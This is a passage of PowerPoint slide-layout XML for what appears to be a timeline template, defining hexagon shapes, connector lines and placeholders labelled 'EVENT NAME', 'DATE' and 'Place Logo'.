              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="l">
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="l">
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="l">
              <a:defRPr lang="en-US" sz="1400"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D107D730-2B33-4803-9B97-A537BB12A9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1847D2-2C34-49CC-95AA-634E51E1C397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="3219450" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="381000" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:no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13" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{077AEE63-F878-4F29-82B9-F5A9E5EC72A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637516-30AB-43B8-A464-D4FBF3CEEB5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="7"/>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D6923838-8D24-4CFB-96F3-138488C99821}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{58C8225E-C508-4D32-A1B7-CF343CE4BFE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7FCBE14-B031-4558-8351-2FEF62FBB5DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="8"/>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1848AF28-89D1-4512-9861-DF434357029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 name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{81447E9E-1A13-4376-AEB2-CE15B069A0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8A284B-7EFC-4CE1-82E7-884146A91C20}"/>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51D28B83-0179-48CB-AD2C-2FE02851A0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CB9A671-4661-432E-B7AF-BC439683F45E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8608219" y="469057"/>
            <a:ext cx="357187" cy="250031"/>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119BCAA1-5D30-41D7-B330-89005A525B08}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{D7ADFBBB-0DE3-42E8-8B6A-2B970F1D5DF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FF282A8-AB3C-46A1-9A46-9714CB1193D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7972425" y="4746802"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{5DA12EE8-22FB-4B48-A20F-3C278BC423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E194611-EB1A-480E-8339-D784C546496C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3400425"/>
            <a:ext cx="9144000" cy="42862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 16">
            <a:extLst>
              <a:ext uri="{B81D9025-4823-46B2-B530-66A0506856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C142CAF-3D39-4DCA-A88F-1F8EDB1630E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1696924" y="2526845"/>
            <a:ext cx="5451448" cy="352635"/>
            <a:chOff x="2262566" y="3369127"/>
            <a:chExt cx="7268597" cy="1751256"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="7" name="Straight Connector 18">
              <a:extLst>
                <a:ext uri="{4D6EE104-3985-4FA0-9009-B87B4334D1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F00CC4C-44AE-45DF-BC7D-C1597EAA0F30}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2262566" y="3369127"/>
              <a:ext cx="0" cy="1751256"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 19">
              <a:extLst>
                <a:ext uri="{417BF05E-237C-415B-966F-029F238825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393E11-8A36-47C6-B8C4-C0159179CC18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4672806" y="3369127"/>
              <a:ext cx="0" cy="1751256"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Connector 20">
              <a:extLst>
                <a:ext uri="{65C93CEB-537C-4126-BB59-CC01FC5E061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9663F5-B27F-4A6E-89C0-35CB564E37AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7117830" y="3369127"/>
              <a:ext cx="0" cy="1751256"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="Straight Connector 21">
              <a:extLst>
                <a:ext uri="{095060D5-E937-4F77-9D06-1043A49027C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1D3F03C-9318-43B5-9D98-2EAB65E360D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9531163" y="3369127"/>
              <a:ext cx="0" cy="1751256"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Hexagon 29">
            <a:extLst>
              <a:ext uri="{2A21F62A-6899-4793-B452-9A57F995D79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C5F7EC8-AC51-41BF-9786-3CEA46D3806B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033462" y="2857500"/>
            <a:ext cx="1285875" cy="1107281"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">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Unica One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Hexagon 30">
            <a:extLst>
              <a:ext uri="{1A5432B5-F917-41CF-BAA4-4F89C43AD6B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E58551-5113-4C9B-A2AB-E08CB085063B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033462" y="2857500"/>
            <a:ext cx="1285875" cy="1107281"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix amt="14999"/>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Unica One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Hexagon 33">
            <a:extLst>
              <a:ext uri="{64B8D747-199E-4547-B7BE-ECFC749DB74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4C345E2-3BA1-42DF-94DF-95D1A06CC489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2857500" y="2857500"/>
            <a:ext cx="1285875" cy="1107281"/>
          </a:xfrm>
          <a:prstGeom prst="hexag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Unica One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Hexagon 34">
            <a:extLst>
              <a:ext uri="{B1ECA0CF-7117-4611-BC55-D3979D5AF91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364FBD9-B0F5-4FB0-9A09-6E2A0328E662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2857500" y="2857500"/>
            <a:ext cx="1285875" cy="1107281"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix amt="14999"/>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Unica One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Hexagon 37">
            <a:extLst>
              <a:ext uri="{539F1CEE-3DC3-4324-ADFA-50E22F32A44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EE4783-EBCD-4C8C-A4F7-3E6EF94C9AAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681537" y="2857500"/>
            <a:ext cx="1285875" cy="1107281"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">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Unica One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Hexagon 38">
            <a:extLst>
              <a:ext uri="{FD9EEA3C-0674-4D74-9CF1-BA7884EB868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EFE1C0D-74A5-45CD-B36B-29FE1A5AA31A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681537" y="2857500"/>
            <a:ext cx="1285875" cy="1107281"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix amt="14999"/>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Unica One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Hexagon 41">
            <a:extLst>
              <a:ext uri="{A9CF15DE-94B6-4935-B4EC-6F4570F8AA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F7EEB52-E0F4-475F-917E-E964FBCCD620}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6505574" y="2857500"/>
            <a:ext cx="1285875" cy="1107281"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">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Unica One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Hexagon 42">
            <a:extLst>
              <a:ext uri="{F0A0C8BF-256C-4527-814E-965F4260493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16F9FFB-0EE2-4038-B4E2-85E897827D1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6505574" y="2857500"/>
            <a:ext cx="1285875" cy="1107281"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix amt="14999"/>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Unica One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{120F9D91-7671-45DD-9827-9F7967DEBB0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E63E6ED-7CC8-4668-B7F1-819421F92B27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681537" y="2857500"/>
            <a:ext cx="1285875" cy="1107281"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EVENT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NAME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{70E5DE39-8826-4152-AC62-0E758334BF6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FCB41CE-CFC6-4825-A9FF-0CDC520C74E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6505574" y="2857500"/>
            <a:ext cx="1285875" cy="1107281"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EVENT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NAME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{1672203B-AFBE-4D9F-BE1A-96DC4B26006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E0E529E-EA7D-416E-A743-304E1A9A1975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2857500" y="2857500"/>
            <a:ext cx="1285875" cy="1107281"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EVENT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NAME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{6573E31C-2977-4EC7-9609-0881960ECA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57B86AF-56F2-4028-9AFF-1186D2DDBC24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033462" y="2857500"/>
            <a:ext cx="1285875" cy="1107281"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EVENT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NAME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 53">
            <a:extLst>
              <a:ext uri="{10D7F095-AA35-47BF-A71A-8191E4C561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C7A75BA-1BF5-463C-ABC5-329DCECF45D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4705952" y="2039376"/>
            <a:ext cx="1275416" cy="473852"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DATE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Placeholder 53">
            <a:extLst>
              <a:ext uri="{51B41242-589D-455E-9870-49AF9650436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F46C57-19B1-4092-A50C-E3070C79617A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2866894" y="2039376"/>
            <a:ext cx="1275416" cy="473852"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DATE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 53">
            <a:extLst>
              <a:ext uri="{A2ACE32B-618A-496D-992C-27F097EFE15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9B0047-2488-4FD6-9D3E-944D665F39D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1057139" y="2039376"/>
            <a:ext cx="1275416" cy="473852"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DATE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
